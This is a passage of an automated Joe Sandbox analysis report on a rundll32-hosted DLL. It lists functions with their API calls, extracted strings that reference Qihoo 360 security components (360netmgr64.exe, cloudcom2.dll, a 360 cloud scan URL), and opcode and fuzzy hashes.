String ID: 171.8.167.45
API String ID: 54951025-2723241389
Opcode ID: c613ed53884643e468c93d26139486e7ce2b6a222746f2eb2a03ddc5eee8fcaf
Instruction ID: 6a4d9e5af3b7fe325f305a351fddb1550b0511be510aa380e1f715ce345513cb
Opcode Fuzzy Hash: c613ed53884643e468c93d26139486e7ce2b6a222746f2eb2a03ddc5eee8fcaf
Instruction Fuzzy Hash: A9119F30506B4A96FAD28B18FC883D573A9B75E3B4F60C619E4B8862A5DF39C31DC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006E760 Relevance: 2.6, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006E7BB
memmove.MSVCRT ref: 000000018006E914

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: a4ba61015edab21776f21e5d3c7e746d690af29fe166f88a08324b0bfea2f5c5
Instruction ID: da75a323986b8cca093bd553c2851a72668ac7db1b6b6204200021213a432db4
Opcode Fuzzy Hash: a4ba61015edab21776f21e5d3c7e746d690af29fe166f88a08324b0bfea2f5c5
Instruction Fuzzy Hash: 155138332083C88BE7A5CF55B84479AB7A5F7897C8F249129FF5643A44EB39C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006F0B4 Relevance: 2.6, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006F10F
memmove.MSVCRT ref: 000000018006F268

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: b98635a0569bbb7a855719908571297cbe41cd56ce58496ddbcbdb8ffdd2d2bd
Instruction ID: 35c224199bfa7a48eec0e2752ffc87f067f2fb1608c0cc96f0c16eec6be2b2a8
Opcode Fuzzy Hash: b98635a0569bbb7a855719908571297cbe41cd56ce58496ddbcbdb8ffdd2d2bd
Instruction Fuzzy Hash: 1B51167320838887D3B5CF55F8507AAB7A5F3897C8F249129EB9647B44EB78D649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800764F0 Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

, xrefs: 000000018007666B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
Instruction ID: d948c05783dfcc8f414146daf0bc33694b5aab0ea18eb2405acab33e08474a3f
Opcode Fuzzy Hash: e34852a907321b2c0a310d6cd3ff2b21c578a08cefc5c87ec14e93545dda5b93
Instruction Fuzzy Hash: 28C10072B156988BEB96CF19E0447A9B791F388BC0F44C125EF4A43794DB3DD948CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800072A8 Relevance: 1.5, APIs: 1, Instructions: 33comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00000001800072EA

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
Instruction ID: 6ec33ab1fa450f55db5ffdc818d68adc5a85fbeb1e267d9be7ac50433cc14072
Opcode Fuzzy Hash: 9ba50c07b379dcee6a9a5179895c46778ea5610e92a9fedb800ebdaca9c7ea9a
Instruction Fuzzy Hash: 32014B36704A4582EB52CF25E850399B3B1F398BC8F54C121EB9D43A28DF39CA5AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A304 Relevance: 1.5, APIs: 1, Instructions: 12timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018006890E), ref: 000000018006A312

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
Instruction ID: 08dfbfac3cec6c5864c5a16d6947d107670323fc72f789c1d02ea2cbe503142f
Opcode Fuzzy Hash: 9d9455a43dc74bf51e2091ade6c5ea1ecea413f883736bedd6ba7ec65b18e945
Instruction Fuzzy Hash: 03D0C976A36544CBDB81CF65E880A99B7E0F79CB10F04A021FA5687718E63CC999CF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A2C8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 000000018006A2F1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006C470 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
Instruction ID: 8b502c5acc43c6004b24afd0fd0336b4788e737aa2c0bff6db02d3fa280909ba
Opcode Fuzzy Hash: 177f8ee2743f692e36716a2a554997d0467f8c68d6d750fb2c00205cb33cda91
Instruction Fuzzy Hash: 312272B7F384204BD31DCB69EC52FA936A2B75434C749A02CAA17D3F44EA3DEA158644

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006D3D4 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
Instruction ID: 12f268bea92222b424f458ad524a46b1b1c1500a46f54a4292c27c4605e25c5b
Opcode Fuzzy Hash: 0d4070d62dad6fb19221950d339e204551eb2b97ff41e5b997223ba163090b91
Instruction Fuzzy Hash: 5E51AC737206448BE758CF3DE845BAD3761F39C38CB545225EA26A7F49DB38E9428B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060FE0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 126
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 0000000180061027
GetProcAddress.KERNEL32 ref: 0000000180061044
GetProcAddress.KERNEL32 ref: 0000000180061061
GetProcAddress.KERNEL32 ref: 000000018006107E
GetProcAddress.KERNEL32 ref: 000000018006109B
GetProcAddress.KERNEL32 ref: 00000001800610B8
GetProcAddress.KERNEL32 ref: 00000001800610D5
GetProcAddress.KERNEL32 ref: 00000001800610F2
GetProcAddress.KERNEL32 ref: 000000018006110F
GetProcAddress.KERNEL32 ref: 000000018006112C
GetProcAddress.KERNEL32 ref: 0000000180061149
GetProcAddress.KERNEL32 ref: 0000000180061166
GetProcAddress.KERNEL32 ref: 0000000180061183
GetProcAddress.KERNEL32 ref: 000000018006119C
GetProcAddress.KERNEL32 ref: 00000001800611B5
GetProcAddress.KERNEL32 ref: 00000001800611D1

Strings

sqlite3_column_int64, xrefs: 000000018006117C
sqlite3_finalize, xrefs: 0000000180061195
sqlite3_prepare16_v2, xrefs: 0000000180061077
sqlite3_column_int, xrefs: 000000018006115F
sqlite3_column_bytes, xrefs: 00000001800611CA
sqlite3_close, xrefs: 000000018006103D
sqlite3_bind_int, xrefs: 00000001800610CE
sqlite3_column_blob, xrefs: 0000000180061125
sqlite3_exec, xrefs: 000000018006105A
sqlite3_bind_blob, xrefs: 00000001800610EB
sqlite3_reset, xrefs: 0000000180061094
sqlite3_bind_int64, xrefs: 00000001800610B1
sqlite3_column_text16, xrefs: 0000000180061142
sqlite3_bind_text16, xrefs: 0000000180061108
sqlite3_bind_parameter_index, xrefs: 00000001800611E6
sqlite3_open16, xrefs: 000000018006101D
sqlite3_step, xrefs: 00000001800611AE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
API String ID: 190572456-2634604785
Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004D480 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330
processsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000000018004D4D7
PathAppendW.SHLWAPI ref: 000000018004D4E8
PathFileExistsW.SHLWAPI ref: 000000018004D503
GetModuleFileNameW.KERNEL32 ref: 000000018004D51F
PathAppendW.SHLWAPI ref: 000000018004D530
PathFileExistsW.SHLWAPI ref: 000000018004D54D

Part of subcall function 0000000180018E8C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
Part of subcall function 0000000180018E8C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
Part of subcall function 0000000180018E8C: DeviceIoControl.KERNEL32 ref: 0000000180018F04
Part of subcall function 0000000180018E8C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

_mbsstr.MSVCRT ref: 000000018004D5C3
_mbsrchr.MSVCRT ref: 000000018004D643
_cwprintf_s_l.LIBCMT ref: 000000018004D6B9
memset.MSVCRT ref: 000000018004D6CC

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

CreateProcessW.KERNEL32 ref: 000000018004D71E
CloseHandle.KERNEL32 ref: 000000018004D731
CloseHandle.KERNEL32 ref: 000000018004D740
ResumeThread.KERNEL32 ref: 000000018004D793
WaitForSingleObject.KERNEL32 ref: 000000018004D7A2
CloseHandle.KERNEL32 ref: 000000018004D7B5
CloseHandle.KERNEL32 ref: 000000018004D7C4
GetExitCodeProcess.KERNEL32 ref: 000000018004D7FD
CloseHandle.KERNEL32 ref: 000000018004D810
CloseHandle.KERNEL32 ref: 000000018004D81F
CloseHandle.KERNEL32 ref: 000000018004D858
CloseHandle.KERNEL32 ref: 000000018004D867

Strings

"%s" %s authcode:, xrefs: 000000018004D58D
..\360netmgr64.exe, xrefs: 000000018004D4DD
..\deepscan\360netmgr64.exe, xrefs: 000000018004D525
cmd:, xrefs: 000000018004D5BC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandle$File$Path$ExistsProcess$AppendCreateCriticalModuleNameSection$CodeControlCurrentDeviceEnterExitLeaveObjectResumeSingleThreadWait_cwprintf_s_l_mbsrchr_mbsstrmemset
String ID: "%s" %s authcode:$..\360netmgr64.exe$..\deepscan\360netmgr64.exe$cmd:
API String ID: 2520577183-130467596
Opcode ID: f46976dcb12b311a6e344114b892ee45deb341f71abb3c9660cb1fee63fdfb12
Instruction ID: 6457104f0d71b0fc63aa0499b97c1156928d9f47c8aaaaeb3038d31e222c5056
Opcode Fuzzy Hash: f46976dcb12b311a6e344114b892ee45deb341f71abb3c9660cb1fee63fdfb12
Instruction Fuzzy Hash: 7CE15272701E4986EB81DF69D89039D7360F789BE8F058626BA3D43AE4DF78C648C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AC40 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 000000018005AD27
VariantInit.OLEAUT32 ref: 000000018005AD40
VariantClear.OLEAUT32 ref: 000000018005AD67
VariantClear.OLEAUT32 ref: 000000018005AD72
VariantClear.OLEAUT32 ref: 000000018005AF35
VariantClear.OLEAUT32 ref: 000000018005AF40

Strings

name, xrefs: 000000018005AD52
propoganda, xrefs: 000000018005AE90
install_first_open, xrefs: 000000018005AE3C
value, xrefs: 000000018005AD99
update_first_open, xrefs: 000000018005AE57
pop_count, xrefs: 000000018005AEAC
tray_startup, xrefs: 000000018005AE73
//root/config/item, xrefs: 000000018005AC7D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Variant$Clear$Init
String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
API String ID: 3740757921-2166998829
Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006442C Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 170libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180064485
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
GetLastError.KERNEL32 ref: 000000018006449C
EnterCriticalSection.KERNEL32 ref: 00000001800644C5
memset.MSVCRT ref: 00000001800644DB
GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
PathAppendW.SHLWAPI ref: 0000000180064508
PathAppendW.SHLWAPI ref: 000000018006451C
GetProcAddress.KERNEL32 ref: 0000000180064549
GetProcAddress.KERNEL32 ref: 000000018006455E
GetProcAddress.KERNEL32 ref: 0000000180064573
GetProcAddress.KERNEL32 ref: 0000000180064588
GetProcAddress.KERNEL32 ref: 000000018006459D
memset.MSVCRT ref: 00000001800645E5
FreeLibrary.KERNEL32 ref: 0000000180064691
LeaveCriticalSection.KERNEL32 ref: 00000001800646A3
??3@YAXPEAX@Z.MSVCRT ref: 00000001800646FD

Strings

360Safe, xrefs: 000000018006460E
QuerySetOption, xrefs: 0000000180064592
..\deepscan\, xrefs: 00000001800644FA
QueryFileClose, xrefs: 0000000180064553
QueryFileCancel, xrefs: 000000018006457D
cloudcom2.dll, xrefs: 000000018006450E
360util, xrefs: 0000000180064628
QueryFileCreate, xrefs: 000000018006453F
QueryFilesEx2, xrefs: 0000000180064568

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
API String ID: 1015768321-2684063875
Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011308 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018001136F
LeaveCriticalSection.KERNEL32 ref: 0000000180011824
std::_Xinvalid_argument.LIBCPMT ref: 0000000180011863

Part of subcall function 0000000180066FF0: _CxxThrowException.MSVCRT ref: 000000018006700D

std::_Xinvalid_argument.LIBCPMT ref: 000000018001187B
std::_Xinvalid_argument.LIBCPMT ref: 0000000180011888

Strings

AddLog, xrefs: 000000018001177C
http://dr.f.360.cn/scan, xrefs: 0000000180011541
Uninit, xrefs: 0000000180011746
list<T> too long, xrefs: 000000018001185C, 0000000180011874, 0000000180011881
dfafidjalkfjdalksjfjklfads, xrefs: 0000000180011694
Init, xrefs: 000000018001172F
CreateLog, xrefs: 0000000180011761
Util, xrefs: 00000001800117DF
RemoveLog, xrefs: 0000000180011797

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$CriticalSection$EnterExceptionLeaveThrow
String ID: AddLog$CreateLog$Init$RemoveLog$Uninit$Util$dfafidjalkfjdalksjfjklfads$http://dr.f.360.cn/scan$list<T> too long
API String ID: 2114436830-3408081781
Opcode ID: 8af349b266fb6ce050c9f194d63605257150183307d7dbbaec6eeb8fed1cca8b
Instruction ID: 5b5dbdcf13791751e20e65a8e34bcc71763f118e9a5d889a3b3f781095819373
Opcode Fuzzy Hash: 8af349b266fb6ce050c9f194d63605257150183307d7dbbaec6eeb8fed1cca8b
Instruction Fuzzy Hash: D0E15A36201F489AEB9A9B51E8443D933A5F78CBD1F54C125EA6A477A5DF38C64EC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800133B0 Relevance: 35.4, APIs: 13, Strings: 7, Instructions: 447COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_wcsicmp.MSVCRT ref: 0000000180013477
_wcsicmp.MSVCRT ref: 000000018001349C
_wcsicmp.MSVCRT ref: 00000001800134DE
_wcsicmp.MSVCRT ref: 00000001800134FE
_wcsicmp.MSVCRT ref: 0000000180013521
memmove.MSVCRT ref: 00000001800138CA
memmove.MSVCRT ref: 00000001800138DC
memmove.MSVCRT ref: 00000001800138F6
memmove.MSVCRT ref: 0000000180013976
memmove.MSVCRT ref: 000000018001398A
??3@YAXPEAX@Z.MSVCRT ref: 00000001800139BF
memmove.MSVCRT ref: 00000001800139C6
memmove.MSVCRT ref: 00000001800139DA

Strings

combo, xrefs: 0000000180013796
mid, xrefs: 000000018001369B
version, xrefs: 0000000180013516
pid, xrefs: 000000018001346C
product, xrefs: 000000018001375E
sysver, xrefs: 00000001800134D3
ipartner, xrefs: 0000000180013491

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$_wcsicmp$??3@HeapProcess
String ID: combo$ipartner$mid$pid$product$sysver$version
API String ID: 2498835641-470606306
Opcode ID: 533747f30ab3afd64085c7c3573a247adbb5a03214601c4fd458ee6f90e90daa
Instruction ID: 928f6af05c4b6ef931632149b6cf4c678087c366cc9f7bb4bb6152addef536b9
Opcode Fuzzy Hash: 533747f30ab3afd64085c7c3573a247adbb5a03214601c4fd458ee6f90e90daa
Instruction Fuzzy Hash: E712DC72700E4891EB92DB65C8423DD2761F748BE8F948222FA6D577A5DF78C68DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066428 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 103registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
RegCloseKey.ADVAPI32 ref: 00000001800664D7
RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
